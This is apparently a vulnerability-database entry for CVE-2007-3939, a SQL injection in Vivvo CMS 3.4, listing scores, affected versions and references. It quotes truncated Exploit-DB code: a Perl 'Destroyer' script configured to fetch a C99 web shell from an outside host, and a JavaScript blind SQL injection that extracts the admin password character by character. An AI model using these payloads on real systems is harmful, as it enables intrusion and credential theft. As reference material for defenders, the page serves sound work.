CVE-2007-3939
published 2007-07-21CVE-2007-3939: SQL injection vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) CMS 3.4 and earlier allows remote attackers to execute…
PriorityP338medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.07%
79.1th percentile
SQL injection vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) CMS 3.4 and earlier allows remote attackers to execute arbitrary SQL commands via the category parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spoonlabs | vivvo_article_management_cms | <= 3.40 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Vivvo CMS 3.4 - Multiple Vulnerabilities
exploitdb·2008-10-19
CVE-2007-3939 Vivvo CMS 3.4 - Multiple Vulnerabilities
Vivvo CMS 3.4 - Multiple Vulnerabilities
---
#!/usr/bin/perl
#Vivvo CMS Destroyer
#[email protected]
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------
print "\n Vivvo CMS Destroyer By Xianur0\n";
#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->
Exploit-DB
Vivvo CMS 3.4 - 'index.php' Blind SQL Injection
exploitdb·2007-07-18
CVE-2007-3939 Vivvo CMS 3.4 - 'index.php' Blind SQL Injection
Vivvo CMS 3.4 - 'index.php' Blind SQL Injection
---
Vivvo CMS
//'===============================================================================================
//'[Script Name: Vivvo CMS ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(1)") {
No writeups or analysis indexed.
http://osvdb.org/39110http://www.securityfocus.com/bid/24955https://exchange.xforce.ibmcloud.com/vulnerabilities/35464https://www.exploit-db.com/exploits/4192http://osvdb.org/39110http://www.securityfocus.com/bid/24955https://exchange.xforce.ibmcloud.com/vulnerabilities/35464https://www.exploit-db.com/exploits/4192
2007-07-21
Published